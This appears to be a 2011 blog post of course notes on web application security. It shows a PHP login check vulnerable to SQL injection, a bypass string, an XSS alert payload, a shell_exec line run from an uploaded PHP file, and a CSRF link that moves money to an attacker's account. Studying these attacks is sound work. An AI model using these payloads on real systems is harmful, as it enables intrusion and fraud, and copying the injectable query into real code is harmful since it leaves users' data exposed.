Tuesday, March 1, 2011

Web application security

PHP code
PHP code is execute at the server side, Apache understands the PHP code, after the execution, it will give result of client side. If you run $wget login.php, the login.php will execute at server, and generate the result and pass it to the wget tool.

SQL injection
e.g. by pass the login authentication
This is the PHP code of checking if username and passpword is correct
    function checkuser($username, $password)
    {
    $db = "/home/fz2135/sqlite/cs4180";
    $handle = sqlite_open($db) or die("cannot open db");
    $query = "select * from userinfo where userinfo.password = '$passwordhash' AND username ='$username';";   
    $result= sqlite_query($handle, $query) or die("die in query");
    sqlite_close($handle);
    if(sqlite_num_rows($result) > 0)
        return true;
    else
        return false;   
    }

If I put uername as: user1' or '1=1
and password as random string
I could bypass the login authentication, but user1 need to be a valid username

Cross-site-scripting (XSS)
e.g.  we could inject a java script on the posted message. Post following message:<scirpt>alert("XSS")</script>


Arbitrary Code Execution
For eample, the vulnerable website allow you add attachment, like pictures. For this case, you could upload a php file, which Apache server could understand it. In the php file, you could use shell_exec() function

$output= shell_exec('cp ../../login.php login.txt');
echo $output."<br>";


Cross-Site Request Forgery (CSRF)


You found: if Alice transfer 100 dollars to Bob by using URL

GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1

Then you could create a html link, and let Alice to click on:

<a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a>

Then you will get 100000 dollars money into your account

more info:
http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29

- The Open Web Application Security Project (OWASP),
"Top 10 web application vulnerabilities".
http://www.owasp.org/index.php/Top_10_2007

- milw0rm, "Finding vulnerabilities in PHP scripts".
http://www.milw0rm.com/papers/381
Posted by at
Labels: , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)